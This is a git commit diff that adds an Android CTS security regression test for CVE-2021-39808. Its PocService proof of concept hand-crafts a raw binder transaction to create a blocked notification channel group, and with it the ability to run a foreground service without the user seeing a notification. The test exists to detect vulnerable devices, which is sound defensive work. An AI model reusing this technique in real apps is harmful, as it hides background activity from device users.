diff options
| author | TreeHugger Robot <treehugger-gerrit@google.com> | 2022-09-05 15:46:19 +0000 |
|---|---|---|
| committer | Automerger Merge Worker <android-build-automerger-merge-worker@system.gserviceaccount.com> | 2022-09-05 15:46:19 +0000 |
| commit | 89df0570229991d1c525c57baf8a018a574c5668 (patch) | |
| tree | 483201423b90b6965b3e974ba28b082628127526 | |
| parent | 8c08e23fff6d77483c0669a446c726b58f10cabb (diff) | |
| parent | 4ee67ed9dffd4ea8857c96587b90ab64baa56912 (diff) | |
| download | cts-89df0570229991d1c525c57baf8a018a574c5668.tar.gz | |
Merge "CTS test for Android Security b/209966086" into qt-dev am: edeac289b1 am: b6f13a518d am: e2f3d9e5f5 am: 055841886f am: 947b0f4b19 am: 4ee67ed9df
Original change: https://googleplex-android-review.googlesource.com/c/platform/cts/+/19569017
Change-Id: Idd275599542d4ac72af56993fee7f49ef9c0589b
Signed-off-by: Automerger Merge Worker <android-build-automerger-merge-worker@system.gserviceaccount.com>
7 files changed, 400 insertions, 0 deletions
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39808.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39808.java new file mode 100644 index 00000000000..a55229abe45 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39808.java @@ -0,0 +1,51 @@ +/* + * Copyright (C) 2022 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import static org.junit.Assume.assumeNoException; + +import android.platform.test.annotations.AsbSecurityTest; + +import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase; +import com.android.tradefed.device.ITestDevice; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; + +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2021_39808 extends StsExtraBusinessLogicHostTestBase { + + @AsbSecurityTest(cveBugId = 209966086) + @Test + public void testPocCVE_2021_39808() { + try { + final String testPkg = "android.security.cts.CVE_2021_39808"; + + ITestDevice device = getDevice(); + + AdbUtils.runCommandLine("input keyevent KEYCODE_WAKEUP", device); + AdbUtils.runCommandLine("input keyevent KEYCODE_MENU", device); + AdbUtils.runCommandLine("input keyevent KEYCODE_HOME", device); + + installPackage("CVE-2021-39808.apk"); + runDeviceTests(testPkg, testPkg + "." + "DeviceTest","testService"); + } catch (Exception e) { + assumeNoException(e); + } + } +} diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/Android.bp new file mode 100644 index 00000000000..13a86e3b68e --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/Android.bp @@ -0,0 +1,38 @@ +/* + * Copyright (C) 2022 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +package { + default_applicable_licenses: ["Android-Apache-2.0"], +} + +android_test_helper_app { + name: "CVE-2021-39808", + defaults: [ + "cts_support_defaults", + ], + srcs: [ + "src/**/*.java", + ], + test_suites: [ + "sts", + ], + static_libs: [ + "androidx.test.core", + "androidx.test.rules", + ], + platform_apis: true, +} diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/AndroidManifest.xml new file mode 100644 index 00000000000..0394d6ccb6a --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/AndroidManifest.xml @@ -0,0 +1,30 @@ +<?xml version="1.0" encoding="utf-8"?> +<!-- + Copyright 2022 The Android Open Source Project + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. +--> +<manifest xmlns:android="http://schemas.android.com/apk/res/android" + package="android.security.cts.CVE_2021_39808"> + <uses-permission android:name="android.permission.FOREGROUND_SERVICE"/> + <application> + <service + android:name=".PocService" + android:exported="true"> + </service> + </application> + + <instrumentation + android:name="androidx.test.runner.AndroidJUnitRunner" + android:targetPackage="android.security.cts.CVE_2021_39808" /> +</manifest> diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/res/values/integers.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/res/values/integers.xml new file mode 100644 index 00000000000..8e7d104c6d2 --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/res/values/integers.xml @@ -0,0 +1,27 @@ +<?xml version="1.0" encoding="utf-8"?> +<!-- + Copyright 2022 The Android Open Source Project + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. + --> +<resources> + <integer name="assumptionFailure">4</integer> + <integer name="fail">2</integer> + <integer name="falseVal">-1</integer> + <integer name="height">50</integer> + <integer name="pass">3</integer> + <integer name="setFlag">1</integer> + <integer name="timeoutMs">10000</integer> + <integer name="value">0</integer> + <integer name="width">50</integer> +</resources> diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/res/values/strings.xml new file mode 100644 index 00000000000..f4fb7413e40 --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/res/values/strings.xml @@ -0,0 +1,35 @@ +<?xml version="1.0" encoding="utf-8"?> +<!-- + Copyright 2022 The Android Open Source Project + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. + --> +<resources> + <string name="assumptionFailure">Assumption failure occurred</string> + <string name="errorNoMethodFound">No method found</string> + <string name="errorTargetMethodNotFound">Target method not found</string> + <string name="flag">flag</string> + <string name="functionName">createNotificationChannelGroups</string> + <string name="group">group</string> + <string name="groupId">groupId</string> + <string name="illegalCode">Illegal Code</string> + <string name="messageKey">MESSAGE</string> + <string name="resultKey">RESULT</string> + <string name="message">message</string> + <string name="notification">notification</string> + <string name="passMessage">Passed</string> + <string name="sharedPreference">CVE_2021_39808</string> + <string name="vulnerableMessage"> + Vulnerable to b/209966086!! Foreground service ran without user notification + </string> +</resources> diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/src/android/security/cts/CVE_2021_39808/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/src/android/security/cts/CVE_2021_39808/DeviceTest.java new file mode 100644 index 00000000000..a32638dda2c --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/src/android/security/cts/CVE_2021_39808/DeviceTest.java @@ -0,0 +1,82 @@ +/* + * Copyright (C) 2022 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts.CVE_2021_39808; + +import static androidx.test.core.app.ApplicationProvider.getApplicationContext; +import static org.junit.Assert.assertNotEquals; +import static org.junit.Assume.assumeNoException; +import static org.junit.Assume.assumeTrue; + +import android.content.Context; +import android.content.Intent; +import android.content.SharedPreferences; +import android.content.SharedPreferences.OnSharedPreferenceChangeListener; +import android.content.res.Resources; + +import androidx.test.runner.AndroidJUnit4; + +import java.util.concurrent.Semaphore; +import java.util.concurrent.TimeUnit; + +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(AndroidJUnit4.class) +public class DeviceTest { + + @Test + public void testService() { + try { + Context context = getApplicationContext(); + Intent intent = new Intent(context, PocService.class); + intent.addFlags(Intent.FLAG_ACTIVITY_CLEAR_TASK); + context.startService(intent); + SharedPreferences sh = context.getSharedPreferences( + context.getString(R.string.sharedPreference), + Context.MODE_APPEND); + final Semaphore preferenceChanged = new Semaphore(0); + OnSharedPreferenceChangeListener listener = new OnSharedPreferenceChangeListener() { + @Override + public void onSharedPreferenceChanged( + SharedPreferences sharedPreferences, String key) { + if (key.equals(context.getString(R.string.resultKey))) { + if (sharedPreferences.getInt(key, 0) == context + .getResources().getInteger(R.integer.pass)) { + preferenceChanged.release(); + } + } + } + }; + sh.registerOnSharedPreferenceChangeListener(listener); + + preferenceChanged.tryAcquire( + context.getResources().getInteger(R.integer.timeoutMs), + TimeUnit.MILLISECONDS); + + int result = sh.getInt(context.getString(R.string.resultKey), + context.getResources().getInteger(R.integer.pass)); + String message = sh.getString(context.getString(R.string.messageKey), + context.getString(R.string.passMessage)); + assumeTrue(message, result != context.getResources() + .getInteger(R.integer.assumptionFailure)); + assertNotEquals(message, result, + context.getResources().getInteger(R.integer.fail)); + } catch (Exception e) { + assumeNoException(e); + } + } +} diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/src/android/security/cts/CVE_2021_39808/PocService.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/src/android/security/cts/CVE_2021_39808/PocService.java new file mode 100644 index 00000000000..73b0df4adfb --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39808/src/android/security/cts/CVE_2021_39808/PocService.java @@ -0,0 +1,137 @@ +/* + * Copyright (C) 2022 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts.CVE_2021_39808; + +import android.app.INotificationManager; +import android.app.NotificationChannelGroup; +import android.app.NotificationManager; +import android.app.Service; +import android.content.Context; +import android.content.Intent; +import android.content.SharedPreferences; +import android.os.IBinder; +import android.os.Parcel; +import android.os.ServiceManager; +import android.text.TextUtils; + +import java.lang.reflect.Method; + +public class PocService extends Service { + + @Override + public IBinder onBind(Intent intent) { + return null; + } + + @Override + public void onCreate() { + try { + super.onCreate(); + setResult(getResources().getInteger(R.integer.fail), + getResources().getString(R.string.vulnerableMessage)); + createNotificationGroup(); + } catch (Exception e) { + setResult(getResources().getInteger(R.integer.assumptionFailure), + e.getMessage()); + } + } + + void createNotificationGroup() throws Exception { + IBinder binder = ServiceManager + .getService(getResources().getString(R.string.notification)); + int serviceId = getTransactionCode( + getResources().getString(R.string.functionName)); + if (serviceId == -1) { + setResult(getResources().getInteger(R.integer.assumptionFailure), + getString(R.string.errorNoMethodFound)); + return; + } else if (serviceId == -2) { + setResult(getResources().getInteger(R.integer.assumptionFailure), + getString(R.string.errorTargetMethodNotFound)); + return; + } + createNotificationGroup(binder, serviceId); + NotificationManager notificationManager = (NotificationManager) getSystemService( + NOTIFICATION_SERVICE); + NotificationChannelGroup notificationChannelGroup = notificationManager + .getNotificationChannelGroup( + getResources().getString(R.string.groupId)); + if (!notificationChannelGroup.isBlocked()) { + setResult(getResources().getInteger(R.integer.pass), + getResources().getString(R.string.passMessage)); + } + } + + int getTransactionCode(String methodName) { + int txCode = IBinder.FIRST_CALL_TRANSACTION; + String txName = INotificationManager.Stub + .getDefaultTransactionName(txCode); + if (txName == null) { + return -1; + } + while (txName != null && txCode <= IBinder.LAST_CALL_TRANSACTION) { + txName = INotificationManager.Stub + .getDefaultTransactionName(++txCode); + if (txName.equals(methodName)) { + break; + } + } + if (txName == null) { + return -2; + } + return txCode; + } + + void createNotificationGroup(IBinder binder, int code) throws Exception { + String description = binder.getInterfaceDescriptor(); + Parcel data = Parcel.obtain(); + Parcel reply = Parcel.obtain(); + data.writeInterfaceToken(description); + data.writeString(this.getPackageName()); + data.writeInt(getResources().getInteger(R.integer.setFlag)); + data.writeInt(getResources().getInteger(R.integer.setFlag)); + data.writeString(NotificationChannelGroup.class.getName()); + data.writeInt(getResources().getInteger(R.integer.setFlag)); + data.writeByte((byte) getResources().getInteger(R.integer.setFlag)); + data.writeString(getResources().getString(R.string.groupId)); + TextUtils.writeToParcel(getResources().getString(R.string.group), data, + getResources().getInteger(R.integer.setFlag)); + data.writeByte((byte) getResources().getInteger(R.integer.value)); + data.writeInt(getResources().getInteger(R.integer.falseVal)); + data.writeInt(getResources().getInteger(R.integer.setFlag)); + boolean val = (boolean) binder.transact(code, data, reply, + getResources().getInteger(R.integer.value)); + if (!val) { + setResult(getResources().getInteger(R.integer.assumptionFailure), + getResources().getString(R.string.illegalCode)); + } + reply.readException(); + } + + private void setResult(int result, String message) { + try { + SharedPreferences sh = getSharedPreferences( + getString(R.string.sharedPreference), Context.MODE_PRIVATE); + SharedPreferences.Editor edit = sh.edit(); + edit.putInt(getString(R.string.resultKey), result); + edit.putString(getString(R.string.messageKey), message); + edit.commit(); + } catch (Exception e) { + // ignore exception + } + } +} |